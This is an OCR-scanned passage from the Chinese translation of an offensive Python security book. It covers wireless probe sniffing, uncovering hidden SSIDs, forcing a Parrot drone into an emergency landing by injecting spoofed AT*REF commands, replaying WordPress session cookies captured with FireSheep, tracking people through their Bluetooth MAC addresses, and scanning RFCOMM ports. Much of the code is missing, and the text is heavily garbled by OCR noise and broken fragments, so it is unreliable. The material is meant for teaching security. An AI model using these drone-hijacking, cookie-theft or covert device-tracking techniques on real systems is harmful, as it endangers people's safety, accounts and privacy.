网 络 关 挤 ， 以 便 学 生 认 真 听讲 ， 同 时 也 防止 他 们 黑 掉 无 意 中 连 上 来 的 无 境 人 士 。 在 上 课 前 几 
分 钟 ， 我 启动 了 一 个 无 线 网 络 扫 描 器 想 把 扫描 结果 作为 课堂 演示 的 一 部 分 。 我 注意 到 一 些 很 
有 意思 的 事 : 教室 里 不 少 学 生 的 机 器 会 探测 他 们 首选 的 网 络 ， 并 试图 去 连接 该 网 络 。 有 一 个 
刚 从 洛杉矶 回来 的 同学 ， 他 的 电脑 探测 到 “LAX Wireless” 和 “Hooters WiFi” 这 两 个 网 络 ， 
于 是 我 搞 了 个 恶作剧 ， 我 问 他 是 否 喜 欢 LAX 那里 的 短暂 停留 ， 以 及 旅途 中 他 是 不 是 入 住 过 
Hooters 酒店 。 他 一 脸 惊 讶 地 问 : “你 怎么 知道 的 ? ” 


侦 听 802.11 Probe 请 求 


为 了 提供 一 个 无 缝 连接 ， 你 的 电脑 和 手机 里 经 常会 有 一 个 首选 网 络 列表 ， 其 中 含有 你 曾 
经 成 功 连接 过 的 网 络 名 字 。 在 你 的 电脑 启动 后 或 者 从 某 个 网 络 断 线 掉 下 来 的 时 候 ， 电 脑 会 发 
送 802.11 Probe 请 求 来 搜索 列表 中 的 各 个 网 络 名 。 

让 我 们 快速 写 一 个 工具 来 发 现 802.11 Probe 请 求 。 在 这 个 例子 中 ， 我 们 将 调用 数据 包 处 
FH pk AX sniffProbe(0) 。 注 意 ， 我 们 挑 出 802.11 Probe 请 求 的 方法 是 把 数据 包 传 给 
haslayer(Dot11ProbeReq) 函 数 ， 看 它 的 返回 值 是 否 为 true。 如 果 请 求 含 有 一 个 新 的 网 络 名 称 ， 
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就 把 它 在 屏幕 上 显示 出 来 。 






O 现在， 我 们 可 以 启动 我 们 的 脚本 ， 看 看 附近 有 没有 计算 机 或 手机 发 出 的 Probe 请 求 。 这 
可 以 让 我 们 看 见 这 些 客户 端 上 首选 网 络 列表 中 的 各 个 网 络 名 。 






寻找 隐藏 网 络 的 802.11 信 和 标 


尽管 大 部 分 网 络 都 会 公开 显示 他 们 的 网 络 名 〈BSSID) ， 但 有 的 无 线 网 络 会 使 用 一 个 隐 
藏 的 SSID 来 保护 它 的 网 络 名 不 被 发 现 。802.11 信 标 帧 中 的 info 字段 一 般 都 包含 网 络 名 。 在 隐 
藏 的 网 络 中 ，Wi-Fi 热点 不 会 去 填写 这 个 字段 ， 搜 寻 隐 藏 的 网 络 其 实 很 简单 ， 因 为 我 们 只 要 去 
找 info 字段 被 留 白 的 802.11 信 标 帧 就 可 以 。 在 接 下 来 的 例子 中 ， 我 们 会 搜索 这 些 数 据 帧 ， 并 
把 无 线 热点 的 MAC 地 址 打印 出 来 。 
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找 出 隐藏 的 802.11 网 络 的 网 络 名 


尽管 热点 没有 填写 802.11 信 标 帧 中 的 info 字段 ， 但 它 在 Probe 响应 帧 中 还 是 要 将 网 络 名 
传输 出 来 。 为 了 揪 出 隐藏 的 网 络 名 ， 我 们 必须 等 待 那 个 与 我 们 的 802.11 ERWA Mac 地 址 匹 
配 的 Probe 响应 帧 出 现 。 我 们 在 一 小 段 Python 脚本 中 用 两 个 数组 把 它们 串 在 一 起 。 其 中 一 个 
数组 是 hiddenNets， 我 们 用 它 记 录 已 经 找到 的 能 唯一 标识 隐藏 网 络 的 MAC 地 址 。 另 一 个 数组 
是 unhiddenNets， 我 们 用 它 来 记录 已 经 找到 网 络 名 的 隐藏 网 络 。 当 我 们 发 现 一 个 没有 名 字 的 
802.11 信 标 帧 时 ， 就 把 它 添 加 到 那个 表示 隐藏 网 络 的 数组 中 。 当 发 现 一 个 802.11 probe 响应 帧 
时 ， 我 们 就 提取 出 它 的 名 字 。 我 们 要 查找 hiddenNets 数组 ， 看 在 该 数组 中 是 否 有 它 的 记录 ， 
还 要 查看 unhiddenNets 数组 ， 看 在 该 数组 中 是 不 是 没有 它 的 记录 。 如 果 两 个 条 件 都 能 被 满 
足 ， 我 们 就 解析 出 网 络 名 ， 并 把 它 显 示 在 屏幕 上 。 






运行 隐藏 的 SSID 探测 脚本 ， 我 们 可 以 看 到 它 正确 地 辨识 出 了 一 个 隐藏 的 网 络 ， 并 找 出 了 
它 的 网 络 名 。 而 这 一 切 只 用 不 到 30 行 代码 ， 这 实在 是 太 令 人 兴奋 了 。 在 下 一 节 中 ， 我 们 会 转 
而 进行 主动 式 无 线 攻击 一 伪造 数据 包 来 接管 无 人 机 。 
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attacker:~# python sniffHidden.py | 
[-] Detected Hidden SSID with MAC: 00:DE:AD:BE:EF:01 
[+] Decloaked Hidden SSID: Secret-Net for MAC: 00:DE:AD:BE:EF:01 


用 Python 截取 和 监视 无 人 机 


2009 年 夏 ， 美 国 军 方 注意 到 伊拉克 发 生 了 一 些 值得 关注 的 事情 。 美 国士 兵 从 非法 武装 那 
里 收集 到 了 一 些 笔记 本 电脑 ， 经 调查 后 发 现 ; 这 些 电 脑 中 含有 一 些 由 美军 无 人 机 传 回 的 视频 
材料 。 笔 记 本 电脑 里 上 于 小 时 的 视频 证 明 非 法 武装 有 能 力 截 获 无 人 机 回 传 的 信息 (Shane, 
2009) 。 进 一 步调 查 后 ， 情 报 部 门 发 现 ， 非 法 武装 使 用 的 是 一 款 名 为 SkyGrabber 的 商用 软件 
来 截取 无 人 机 回 传 的 数据 ， 而 该 软件 的 售 价 仅 有 26 美元 (SkyGrabber, 2011) 。 出 乎 他 们 意 
料 的 是 ， 空 军 负责 无 人 机 程序 开发 的 官员 证 实 无 人 机 是 通过 未 经 加 密 的 网 络 向 地 面 控制 中 心 
发 送 视频 的 《MecCullagh，2009) ， 甚 至 都 不 需要 对 SkyGrabber 软件 〈 它 通常 是 用 于 截取 不 
加 密 的 卫星 电视 数据 信号 的 ) 重新 做 任何 配置 ， 就 能 截取 美国 无 人 机 回 传 的 相关 视频 信和 号 。 

攻击 美军 无 人 机 显然 违反 了 《爱国 者 法 案 》， 那 我 们 换 一 个 不 算 违法 的 目标 来 完成 吧 。 
Parrot Ar.Drone 无 人 机 似乎 是 不 错 的 目标 。 作 为 一 款 开源 的 基于 Linux 的 无 人 机 ， 用 户 可 以 通 
过 不 加 密 的 802.11 无 线 网 络 ， 用 iPhone 或 者 iPod 应 用 程序 来 控制 Parrot Ar.Drone。 只 用 不 到 
300 美元 ， 一 个 业余 爱好 者 就 可 以 从 http://ardrone.parrot.com/ 购 得 一 架 无 人 机 。 使 用 我 们 已 经 
学 过 的 工具 就 可 以 获取 目标 无 人 机 的 飞行 控制 权 。 


截取 数据 包 ， 解 析 协 议 


我 们 首先 要 搞 清 无 人 机 和 iPhone 之 间 是 如 何 进 行 通 信 的 。 将 一 个 无 线 网 络 适配器 调 至 泥 
杂 模 式 ， 我 们 发 现 无 人 机 和 iPhone 之 间 建 立 了 一 个 ad-hoc 无 线 网 络 。 在 阅读 了 无 人 机 的 操作 
手册 后 ， 我 们 了 解 到 MAC 地 址 绑 定 被 证 明 是 保护 连接 的 唯一 安全 机 制 。 只 有 配对 成 功 的 
iPhone 才能 给 无 人 机 发 送 飞 行 控制 指令 。 为 了 接管 无 人 机 ， 我 们 必须 搞 清 发 送 这 些 指令 的 协 
议 格式 ， 才 能 在 必要 时 重 放 这 些 指 令 。 

首先 ， 我 们 要 将 适配器 调 至 混杂 模式 来 监听 流量 。 快 速 运行 一 下 tcpdump， 结 果 显 示 : 无 
人 机 发 起 了 一 个 UDP 流量 ， 其 目标 地 址 是 手机 上 的 UDP 5555 端口 。 经 过 一 番 快 速 的 分 析 ， 


8 ad-hoc 〈 点 对 点 ): ad-hoc 模式 就 和 以 前 的 直 连 双 绞 线 概念 一 样 ， 是 P2P 的 连接 ， 所 以 也 就 无 法 与 其 他 
网 络 进行 沟通 。 一 一 译 者 注 
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由 于 该 流量 传输 的 数据 量 较 大 ， 以 及 它 的 目的 地 址 是 手机 ， 我 们 推断 ， 这 一 流量 中 含有 无 人 
机 的 视频 信息 。 相 比 之 下 ， 飞 行 控制 指令 显然 应 该 是 从 iPhone 发 往 无 人 机 的 UDP 5556 端 
ol. 





知道 了 iPhone 是 通过 UDP 5556 端口 向 无 人 机 发 送 飞行 控制 指令 之 后 ， 我 们 可 以 编写 一 
个 Python 脚本 来 把 飞行 控制 流量 解析 出 来 。 注 意 : 我 们 的 脚本 会 把 目的 端口 为 5556 的 UDP 
数据 包 的 二 进 制 内 容 打印 在 屏幕 上 。 






运行 这 一 脚本 让 我 们 初步 了 解 了 无 人 机 的 飞行 控制 协议 。 我 们 发 现 ， 协 议 使 用 的 语法 是 
AT*CMD=SEQUENCE_NUMBER,VALUE,[VALUE{3}] 语 句 。 通 过 分 析 长 时 间 记 录 下 的 流 
量 ， 我 们 搞 清 了 3 个 简单 的 指令 ， 它 们 将 被 证 明 在 我 们 的 攻击 中 是 有 用 的 且 值 得 重复 的 指 
令 。 命 令 AT*REF=$SEQ,290717696r 是 无 人 机 的 降落 指令 ; AT*REF=$SEQ,290717952\r 是 紧 
急迫 降 ， 紧 急 关 闭 无 人 机 引擎 的 指令 ;' AT*REF=SEQ,290718208\r 是 无 人 机 的 起 飞 指令 。 最 
后 ， 我 们 可 以 通过 AT*PCMD=SEQ, Left Right Tilt, Front Back Tilt, Vertical_Speed, 
Angular SpeedNr. 来 控制 无 人 机 的 航向 。 我 们 已 经 了 解 了 这 些 指 令 ， 足 够 进行 一 次 攻击 ， 并 获 
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让 我 们 先 来 编写 一 个 叫 interceptThread 的 Python 类 。 这 个 interceptThread 类 的 一 些 成 员 
变量 中 存储 了 攻击 所 得 的 信息 ， 其 中 包括 当前 抓 取 到 的 数据 包 、 每 条 无 人 机 协议 的 顺序 号 ， 
以 及 一 个 描述 无 人 机 流量 是 否 已 经 被 拦截 的 布尔 量 。 初 始 化 这 些 成 员 变 量 之 后 ， 我 们 要 去 写 
run() 和 interceptPkt() 这 两 个 方法 。run() 方 法 会 启动 一 个 嗅 探 器 ， 并 把 端口 5556 上 的 UDP 数据 
包 过 滤 出 来 ， 然 后 触发 interceptPkt0 方 法 。 前 者 截取 无 人 机 数据 包 后 ， 会 将 Boolean 变量 值 改 
变 为 true。 在 第 一 次 抓 取 到 无 人 机 流量 之 后 ， 这 个 方法 会 把 布尔 量 的 值 改 为 true。 接 下 来 ， 它 
将 提取 出 当前 这 条 无 人 机 命令 的 顺序 号 ， 并 记录 下 当前 包 的 内 容 。 





用 Scapy 制 作 802.11 数 据 帧 


接 下 来 ， 我 们 要 伪造 一 个 包含 我 们 自己 的 无 人 机 命令 的 数据 包 。 为 了 做 到 这 个 ， 我 们 要 
从 当前 的 数据 包 或 者 帧 中 复制 出 必要 的 信息 。 因 为 这 个 数据 包 穿 越 了 RadioTap、802.11、 
SNAP, LLC, IP 和 UDP 层 ， 我 们 要 把 这 些 层 中 的 相关 字段 复制 下 来 。Scapy 天 生 就 支持 解 
析 上 述 各 个 层 的 协议 。 比 如 ， 要 看 Dotll 层 里 的 相关 信息 ， 我 们 就 要 启动 Scapy 输入 ls(Dot11) 
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命令 。 我 们 能 看 到 要 复制 的 必要 字段 的 内 容 ， 并 把 它 放 到 我 们 伪造 的 新 数据 包 中 。 


编写 一 个 完整 的 库 来 复制 RadioTap, 802.11. SNAP, LLC, IP 和 UDP 各 个 层 中 的 信 
息 。 注 意 ， 在 每 个 层 中 都 要 忽略 掉 一 些 字段 ， 比 如 ， 我 们 不 复制 表示 P 包 包 长 的 字段 ， 因 为 
存放 指令 的 包 的 长 度 可 能 会 与 之 不 同 ， 在 创建 这 个 包 时 ， 我 们 可 以 让 Scapy 自动 把 这 个 字段 
的 值 算出 来 。 同 样 ， 我 们 也 不 会 记录 那些 存储 校 验 和 的 字段 。 有 了 复制 包 中 数据 的 库 之 后 ， 
我 们 就 可 以 继续 对 无 人 机 进行 攻击 。 由 于 它 复 制 了 802.11 帧 中 的 大 部 分 字段 ， 所 以 把 这 个 库 
保存 为 文件 dup.py。 
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接 下 来 ， 我 们 要 给 interceptThread 类 添加 一 种 新 方法 一 injectCmd0。 该 方法 复制 了 当前 
数据 包 各 个 层 的 信息 ， 然 后 在 UDP 层 的 载荷 中 加 入 一 条 新 的 指令 。 在 新 的 包 创建 完成 之 后 ， 
会 用 sendp() 方 法 把 它 发 送 给 第 二 层 。 
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紧急 迫降 的 指令 对 控制 无 人 机 来 说 是 一 条 非常 重要 的 指令 。 这 个 指令 可 以 迫使 无 人 机 关 
闭 引擎 ， 并 立即 迫降 下 来 。 为 了 发 出 这 条 指令 ， 我 们 使 用 的 序列 号 是 当前 序列 号 再 加 上 100, 
接 下 来 要 发 出 指令 AT*COMWDG=$SEQN。 这 条 指令 的 作用 是 把 通信 中 的 “看 门 狗 ” 计 数 器 
重 置 成 我 们 新 的 顺序 值 。 之 后 无 人 机 将 会 忽略 之 前 的 或 者 顺序 号 不 匹配 的 指令 (有 点 像 是 行 
货 iPhone 导致 的 问题 )。 最 后 ， 我 们 可 以 发 送 紧急 迫降 指令 AT*REF=$SEQ, 290717952\r。 








完成 攻击 ， 使 无 人 机 紧急 迫降 


让 我 们 重新 整合 一 下 我 们 的 代码 并 完成 攻击 。 首 先 ， 要 确保 我 们 已 经 把 复制 包 中 数据 的 
库 保 存 为 文件 “dup.py”， 以 便 导入 它 。 接 下 来 ， 我 们 要 检查 main() 函 数 。 该 函数 将 会 启动 一 
个 interceptThread 类 ， 监 听 流 量 ， 寻 找 有 没有 无 人 机 。 人 然后 会 提示 发 出 紧急 迫降 的 命令 。 这 
样 ， 用 少 于 70 行 的 Python 脚本 ， 我 们 就 成 功 截获 了 一 架 无 人 机 ， 太 棒 了 ! 尽管 对 我 们 的 行 
为 有 些小 小 的 罪恶 感 。 在 下 一 节 中 ， 我 们 会 着 重 讨论 如 何 识别 发 生 在 未 加 密 网 络 上 的 恶意 行 
为 。 
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探测 火 绵羊 


在 2010 年 的 ToorCon 大 会 上 ， 埃 里 克 。 巴 特 勒 发 布 了 一 款 叫 “ 火 绵羊 ” (FireSheep) 的 
足以 改变 游戏 规则 的 工具 (Butler, 2010) 。 这 个 工具 提供 了 一 个 简单 的 双击 界面 ， 可 以 远程 
接管 Facebook、Twitter、 谷 歌 和 其 他 大 量 社交 媒介 中 毫 无 戒心 的 用 户 账 户 。 埃 里 克 的 火 绵羊 
工具 会 被 动 地 监听 无 线 网 卡 上 由 这 些 Web 站 点 提供 的 cookie。 如 果 用 户 连 接 了 不 安全 的 无 线 
网 络 ， 也 没有 使 用 诸如 HTTPS 之 类 的 服务 端 控制 措施 来 保护 他 /她 的 会 话 ， 火 绵羊 就 会 截获 
这 些 cookie 供 攻 击 者 再 次 使 用 它们 。 

如 果 想 截取 特定 会 话 中 的 cookie， 供 重 放 的 话 ， 埃 里 克也 提供 了 一 个 易 用 的 接口 方便 我 
们 编写 定制 的 处 理 代码 。 注 意 ， 下 面 这 段 处 理 代码 是 针对 Wordpress 的 Cookie 的 ， 其 中 包括 
三 个 函数 : 一 个 是 matchPacket()， 通 过 正则 表达 式 (wordpress_[0-9a-fA-F]{32} ) $R H 
Wordpress cookie。 如 果 该 函数 的 正则 表达 式 能 匹配 ，processPacket0 就 会 提取 Word-press 
"sessionID" cookie。 最 后 ，identifyUser0) 会 解析 出 登录 Wordpress 网 站 的 用 户 名 。 黑 客 就 可 以 
使 用 这 些 信 息 来 登录 Wordpress 网 站 。 
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理解 Wordpress 的 会 话 cookies 


在 真实 的 数据 包 中 ， 这 些 cookies 看 上 去 是 下 面 这 样 的 。 一 名 “受害 者 ”通过 Safari 浏览 
器 连接 到 位 于 www.violentpython.org 上 一 个 用 Wordpress 搭建 的 网 站 。 注 意 以 
“wordpress e3b” 开 头 的 那个 字符 串 ， 其 中 包含 sessionID cookie 以 及 用 户 名 victim. 






接 下 来 ， 一 名 攻击 者 在 火狐 /3.6.24 上 运行 Firesheep 工具 包 ， 发 现 一 些 类 似 的 字符 串通 过 无 
线 网 络 以 不 加 密 的 方式 被 发 送出 来 。 于 是 他 用 这 些 用 户 名 - 密 钥 ?登录 www.violentpython.org。 


9 这 里 的 session cookie 是 用 户 登 录 后 服务 器 发 给 用 户 的 登录 凭据 ， 与 用 户 名 联合 使 用 ， 充 当 了 口令 的 
角色 。 一 一 译 者 注 
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注意 ，HTTP GET 请 求 与 我 们 原始 的 请 求 类 似 ， 而 且 传 递 的 是 同一 个 cookie， 但 原始 请 求 发 
送 自 一 个 不 同 的 浏览 器 。 尽 管 在 这 里 不 再 做 详细 的 描述 ， 但 一 定 要 注意 ， 这 些 请 求 都 来 自 不 
同 的 IP 地 址 ， 因 为 黑客 是 不 会 与 “受害 者 ”使 用 同一 台 机 器 的 。 








牧羊 人 一 一 找 出 Wordpress Cookie 重 放 攻 击 


让 我 们 快速 编写 一 个 Python 脚本 解析 含有 这 些 会 话 cookie 的 Wordpress HTTP 会 话 。 由 
于 这 一 攻击 是 针对 未 加 密 的 会 话 的 ， 所 以 只 需 把 走 在 TCP 80 端口 上 的 HTTP 流量 过 滤 出 来 即 
可 。 当 我 们 看 到 正则 表达 式 找 出 了 表示 Wordpress cookie 时 ， 就 将 cookie 的 内 容 显 示 在 屏幕 
上 。 因 为 我 们 只 想 看 到 客户 端的 流量 ， 不 输出 来 自 服务 器 的 cookie (这 些 cookie 中 会 含有 字 
符 串 “Set”) 。 


s ~ ons 
4, IFE) SS 
i ieee 


7 ia <> 





i | =) Yas l; a mm ai | 
Cc = ED 全 ， 8 U Orn i | 
i tee Pp po. OU ,PI r | 


运行 这 个 脚本 ， 我 们 很 快 会 发 现 一 些 使 用 未 加 密 的 无 线 网 络 连 接 ， 通 过 标准 的 HTTP 会 
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话 连 上 Wordpress 站 点 的 潜在 受害 者 。 当 把 他 们 的 会 话 cookie 输出 在 屏幕 上 时 ， 我 们 注意 到 
使 用 IP 地 址 192.168.1.4 的 一 名 攻击 者 重用 了 IP 地 址 为 192.168.1.3 的 “受害 者 ”的 sessionID 


cookie。 


为 了 找 出 使 用 火 绵羊 的 黑客 ， 我 们 要 确认 的 是 攻击 者 在 不 同 的 IP 地 址 上 重复 使 用 这 些 
cookie 值 。 为 了 检测 出 这 一 情况 ， 我 们 要 修改 之 前 的 脚本 。 现 在 ， 我 们 要 建立 一 个 以 
sessionID cookie 作为 索引 值 的 Hash 表 。 如 果 我 们 看 到 了 Wordpress 会 话 ， 就 以 它 为 关键 码 
(key) ， 把 IP 地 址 保存 到 Hash 表 中 。 如 果 再 次 看 到 这 个 关键 码 ， 就 可 以 比较 它 的 值 是 否 与 
Hash 表 中 的 值 冲突 。 如 果 有 冲突 ， 我 们 就 知道 同一 个 cookie 在 两 个 不 同 的 IP 地 址 上 已 使 
用 。 这 样 ， 我 们 就 能 检测 到 企图 盗用 Wordpress 会 话 的 人 ， 并 将 结果 显示 在 屏幕 上 。 


~ 





Python 绝技 : 运用 Python 成 为 顶级 黑客 


44 $ “ j Sibel f TT M a i ’ 
rE 7 ‘ J P 
ee - 一 1] 站 P S agi | A || 
t | 一 gi 5] = d E T > t 
1 1 ja 1 . 


PY ZEP -2 
È 3 :~ e ct 


a i = S wv 
[一 vw pl 
of. J A 
-A ae y 4 i a 
—_— . ' ow ¢ ry 
br cs pa 
ree 





运行 这 个 脚本 ， 我 们 发 现 了 一 名 攻击 者 ， 他 重用 了 源 自 “受害 者 ”的 Wordpress sessionID 
cookie， 试 图 窃取 受害 者 的 Wordpress 会 话 。 目 前 为 止 ， 我 们 已 经 掌握 了 使 用 Python KRR 
802.11 无 线 网 络 上 信息 的 方法 。 下 一 节 将 学 习 如 何 使 用 Python 攻击 蓝牙 设备 。 





用 Python 搜寻 蓝牙 


研究 生 教育 研究 有 时 确实 是 一 件 让 人 生 晴 的 艰巨 任务 。 着 手 研究 一 个 新 的 课题 需要 团队 
中 每 个 成 员 都 全 身心 地 投入 。 我 发 现 随时 掌握 团队 成 员 在 办 公 室 里 是 很 重要 的 。 由 于 我 的 学 
生 研究 的 课题 都 是 与 蓝牙 协议 有 关 的 。 因 此 ， 蓝 牙 是 个 监控 他 们 是 否 一 直 呆 在 办 公 室 里 的 极 
好 的 切入 点 。 

为 了 能 与 蓝牙 资源 进行 交互 操作 ， 我 们 需要 PyBluez 这 个 Python 模块 。 该 模块 扩展 了 用 
于 使 用 蓝牙 资源 的 Bluez 库 的 功能 。 注 意 ， 当 我 们 导入 蓝牙 库 后 ， 只 要 一 调用 
discover_devices()， 它 就 会 把 附近 所 有 当前 处 于 “可 被 发 现 ” 状 态 下 的 蓝牙 设备 的 MAC 地 址 
放 在 一 个 数组 中 返回 来 。 接 下 来 ，lookup_name() 函 数 将 各 个 蓝牙 设备 的 MAC 地 址 转换 成 方 
便 阅 读 的 字符 串 。 最 后 ， 我 们 会 把 这 些 蓝 牙 设 备 〈 的 名 字 和 MAC 地 址 ) 打印 在 屏幕 上 。 
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接 下 来 要 让 监测 持续 不 断 地 进行 。 要 做 到 这 一 点 ， 我 们 把 上 述 代码 放 到 一 个 名 为 
findDevs 的 函数 里 ， 让 它 只 打印 新 发 现 的 设备 。 我 们 可 以 用 一 个 名 为 alreadyFound 的 数组 来 
记录 那些 已 经 被 找到 的 设备 。 针 对 每 发 现 一 个 设备 ， 我 们 都 要 检查 一 下 它 是 不 是 已 经 在 这 个 
数组 里 了 。 如 果 它 不 在 数组 里 ， 就 要 打印 出 它 的 名 字 和 地 址 到 屏幕 上 ， 然 后 把 它 添加 到 数组 
H., Æ main() 函 数 中 ， 我 们 还 可 以 创建 一 个 无 限 循环 ， 在 该 循环 中 运行 一 次 findDevs() 函 数 ， 
然后 休眠 5 秒 钟 。 






ff. Trt d 
Y 





现在 运行 这 个 Python 脚本 ， 看 它 是 否 能 找到 附近 的 蓝牙 设备 。 请 注意 ， 我 们 找到 了 一 台 
打印 机 和 一 部 记 hone。 打 印 输出 显示 其 用 户 友好 的 名 称 和 其 MAC 地 址 。 






现在 ， 我 们 还 可 以 写 一 个 简单 的 函数 ， 用 它 在 某 些 特定 的 设备 出 现在 检查 范围 内 时 ， 给 
我 们 提 个 醒 。 请 注意 ， 我 们 修改 了 原来 的 函数 ， 给 它 加 了 个 参数 tgtName， 我 们 会 在 已 发 现 的 
设备 列表 中 查找 这 个 指定 的 设备 名 称 是 否 出 现 。” 


10 显然 ， 作 者 下 面 给 出 的 代码 是 错误 的 ， 这 是 之 前 没有 修改 过 的 代码 ， 详 见 本 书 官网 上 提供 的 随 书 代 
码 9-btFind.py。 一 一 译 者 注 | 
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import time 
from bluetooth import * 
alreadyFound = [] 
def findDevs(): 
foundDevs = discover _devices (lookup _ camesercne) 
for (addr, name) in foundDevs: 
~ if addr not in alreadyFound: 
print '[{*] Found Bluetooth Device: ' + str (name) 
print '[+] MAC address: ' + str(addr) 
tt SPEAR AGIT 
while True: ! | 
findDevs () 
time.sleep (5) 


现在 ， 我 们 已 经 有 了 一 个 “武器 级 ”的 工具 ， 它 能 在 某 台 特定 的 蓝牙 设备 〈 比 如 一 部 
iPhone) 进入 时 提醒 我 们 。 


attacker# python btFind.py oe 
[-] Scanning for Bluetooth Device: TJ i | 
[*] Found Target Device TJ iPhone. 
{+] Time is: 2012-06-24 18:05;49..560055 
[+] With MAC Address: D0:23:DB:DE:AD:02 
[+} Time is: 2012-06-24 18:06:05.829156 


截取 无 线 流量 ， 查 找 ( 隐藏 的 ) 监 牙 设备 地 址 


目前 ， 问 题 只 解决 了 一 半 。 我 们 的 脚本 只 能 找到 处 于 “可 被 发 现 ” 模 式 的 蓝牙 设备 。 那 
些 处 于 “不 可 被 发 现 ” 模 式 的 蓝牙 设备 现在 是 找 不 到 的 。 那 么 ， 我 们 怎么 才能 找到 它们 呢 ? 
我 们 来 考虑 一 个 寻找 处 于 “不 可 被 发 现 ” 模 式 的 iPhone 蓝牙 信号 的 小 技巧 : 在 iPhone 里 ， 把 
无 线 网 卡 的 MAC 地 址 加 1， 就 得 到 了 这 人 台 iPhone 的 蓝牙 MAC. HF 802.11 无 线 协议 在 第 2 
层 中 没有 使 用 能 够 保护 MAC 地 址 的 措施 ， 所 以 我 们 可 以 很 方便 地 嗅 探 到 它 ， 然 后 使 用 该 信息 
来 计算 蓝牙 的 MAC 地 址 。 

我 们 来 设置 一 个 嗅 探 无 线 网 卡 的 MAC 地 址 。 请 注意 ， 我 们 只 要 MAC 地 址 的 前 三 个 十 六 
进 制 数 MAC 地 址 的 前 三 个 八 位 字 节 的 MAC 地 址 。 前 三 个 十 六 进 制 数 是 一 个 OUI 
(Organizational Unique Identifier， 组 织 唯 一 标识 人生) ， 它 表示 的 是 设备 制造 商 ， 你 可 以 查询 
http://standards.ieee. org/cgi-bin/ouisearch 上 的 OUI 数据 库 获取 进一步 的 信息 。 在 这 个 例子 中 
用 的 OUI 是 d0:23:db《〈 这 是 苹果 iPhone 4S 的 OUI) 。 如 果 你 查询 OUI 数据 库 ， 可 以 确认 这 
三 个 十 六 进 制 数 是 由 苹果 公司 使 用 的 。 
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我 们 的 Python 脚本 会 侦 听 MAC 地 址 的 前 三 个 十 六 进 制 数 属 于 iPhone 4S 的 802.11 数据 
帧 。 如 果 检 测 到 ， 它 会 把 该 结果 打印 在 屏幕 上 ， 并 把 802.11 帧 中 的 MAC 地 址 保存 下 来 。 







| ` 1 rie - A ts Í 
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j i = Fil SEI g 
h pekea f dE T Vis | If Ny Í I ! 


现在 ， 我 们 已 经 能 识别 出 那些 属于 iPhone 的 802.11 无 线 网 络 的 MAC 地 址 ， 需 要 用 它 算 
出 蓝牙 的 MAC 地 址 。 只 要 把 无 线 网 卡 的 MAC 地 址 加 一 ， 就 可 得 到 蓝牙 的 MAC 地 址 。 






有 了 这 个 MAC 地 址 后 ， 攻 击 者 就 可 以 发 起 一 个 设备 名 称 查询 来 确认 这 个 设备 是 否 真 的 存 
在 。 即 便 是 在 “不 可 被 发 现 ” 模 式 下 ， 蓝 牙 设备 仍 会 响应 设备 名 称 的 查询 请 求 。 如 果 蓝 牙 设 
备 做 出 了 响应 ， 就 把 它 的 名 称 和 MAC 地 址 显示 在 屏幕 上 。 但 有 一 点 要 注意 一 一 如 果 这 部 
iPhone 的 蓝牙 既 没 有 与 其 他 设备 配对 过 ， 也 没有 正在 被 其 他 蓝牙 设备 使 用 。 那 么 当 这 部 
iPhone 正 处 于 省 电 模 式 时 ， 会 把 蓝牙 禁用 掉 。 不 过 ， 如 果 iPhone 与 蓝牙 耳机 或 者 车 载 免 提 通 
话 系 统 配 对 过 ， 那 么 即使 蓝牙 处 于 “不 可 被 发 现 ” 模 式 ， 它 还 是 会 响应 设备 名 称 查询 请 求 
的 。 在 你 测试 的 过 程 中 ， 脚 本 如 果 工 作 不 正常 ， 可 以 尝试 把 你 的 iPhone 和 另 一 个 蓝牙 设 
备 配 对 。 
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当 我 们 把 所 有 的 代码 放 在 一 个 完整 的 脚本 中 后 ， 就 能 识别 出 处 于 “不 可 被 发 现 ” 模 式 下 
的 苹果 iPhone 手机 的 蓝牙 。 











运行 脚本 可 以 看 到 ， 它 识别 出 了 一 部 iPhone 手机 上 的 802.11 无 线 网 卡 的 MAC 地 址 及 它 
的 蓝牙 MAC 地 址 。 在 下 一 节 中 ， 我 们 会 通过 浏览 不 同 蓝牙 设备 端口 信息 的 方式 深入 探究 蓝牙 
设备 。 
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扫 摘 蓝牙 RFCOMM 信 道 


2004 年 的 CeBIT 峰会 上 ，Herfurt 和 Laurie 演示 了 一 个 他 们 称 为 BlueBug 的 蓝牙 漏洞 
(Herfurt, 2004) 。 该 漏洞 针对 的 是 蓝牙 的 RFCOMM 传输 协议 。RFCOMM 通过 蓝牙 L2CAP 
协议 模拟 了 RS232 串 行 端口 。 从 本 质 上 讲 ， 这 会 与 另 一 台 设 备 建 立 一 个 蓝牙 连接 ， 模 拟 一 条 
普通 的 串 行 线 绕 ， 使 用 户 能 够 〈 在 另 一 台 设 备 上 ) 通过 蓝牙 打 电 话 、 发 送 短信 、 读 取 手 机 电 
话 短 中 的 记录 ， 以 及 转 接 电话 或 上 网 。 

虽然 RFCOMM 确实 也 能 建立 需要 认证 的 加 密 连 接 ， 但 厂商 有 时 会 忽略 掉 这 一 功能 ， 人 多 
Y CR) 未 经 认证 的 用 户 与 设备 建立 连接 。Herfurt 和 Laurie 编写 了 一 个 工具 ， 用 它 可 以 在 
未 经 认证 的 情况 下 的 连接 设备 发 送 控制 命令 或 下 载 设备 中 的 信息 。 下 面 将 编写 一 个 扫描 器 ， 
找 出 允许 未 经 认证 建立 RFCOMM 通道 的 设备 。 

看 看 下 面 的 代码 ， 建 立 RFCOMM 连接 的 方法 与 建立 标准 TCP 套 接 字 连 接 的 非常 相似 。 
为 了 连接 到 一 个 RFCOMM 端口 ， 我 们 要 创立 一 个 RFCOMM 类 型 的 蓝牙 套 接 字 
(BluetoothSocket) 。 接 下 来 ， 我 们 向 connectO 函 数 传递 一 个 含有 MAC 地 址 和 目标 端口 的 元 
组 (tuple) 。 如 果 连 接 成 功 ， 就 知道 该 RFCOMM 通道 是 开放 的 且 处 于 监听 状态 。 如 果 函 数 
抛 出 一 个 异常 ， 我 们 就 知道 无 法 连接 到 该 端口 。 

from bluetooth import * 

def rfcommCon(addr, port): 

sock = BluetoothSocket (RFCOMM) 
try: 
sock. „connect ( (addr, port) ) | 
print '[+] RFCOMM Port ' + ieee tae + Ri OE 
sock.close() Meath \ 
except Exception, e: 
print '[-] RFCOMM Port ' + str (port) _ + ' closed’ 


for port in range(1, 30): 
rfcommCon ('00:16:38:DE:AD:11', port) 


当 我 们 用 这 个 脚本 扫描 附近 的 一 台 打 印 机 时 ， 我 们 看 到 有 五 个 开放 的 RFCOMM 端口 ， 
